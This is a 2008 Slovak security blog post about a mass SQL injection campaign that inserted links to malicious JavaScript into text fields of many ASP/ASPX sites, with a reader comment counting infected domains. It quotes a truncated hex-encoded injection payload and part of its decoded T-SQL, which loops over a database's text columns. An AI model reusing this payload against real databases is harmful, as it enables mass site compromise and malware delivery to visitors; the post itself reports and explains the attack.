Saturday, April 26, 2008

Masívny SQL Injection

A je to tu, další v poradí z hromadných SQL Injection útokov, ktorý infikoval tisíce webových stránok.
Výsledok Google vyhľadávania sa pohybuje niekde na hranici 510,000 modifikovaných stránok.


Čím ďalej tým viac webstránok začína používať koncové databázy kôli ich väčšej rýchlosti a dynamike, čo taktiež znamená, že je veľmi rozhodujúce aké data budú uložené do týchto databáz pri vytvorení požiadavky.Obzvlášť vtedy, ak je užívateľovy povolený upload obsahu, ktorý sa môže nachádzať v diskusných fórach, blogoch, atd.
Pokiaľ sa tieto data neošetria ešte pred uložením, nemôžte kontrolovať čo sa bude zobrazovať od užívateľov na stránke.A práve túto slabinu využíva tento typ SQL injekcie.Injekcia kódu vyzerá cca takto (kód nieje úplný):
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…
po dekódovaní:
DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…
Následkom tejto injekcie sa nájdu všetky texty v databáze a vloží sa do nich link, ktorý odkazuje na zákerný javascript.V zásade sa útočníci obzerajú okolo stránok ASP alebo ASPX obsahujúce nejaký querystring (dynamická hodnota ako napríklad ID čláku, produktu, atd.) parameter použitý k uploadu SQL Injection kódu.
src: f-secure

Publikoval #Kenny at 11:01 AM
Kategórie:

1 comment:

Anonymous said...

na sk domenach 7 vyskytov
na cz 4580x
svetovo 670 000x
enjoy

April 28, 2008 at 12:46 AM

Post a Comment

Subscribe to: Post Comments (Atom)
 
website stats
Contact: iwebprotected@gmail.com
(CC) 2008 WebProtected by #Kenny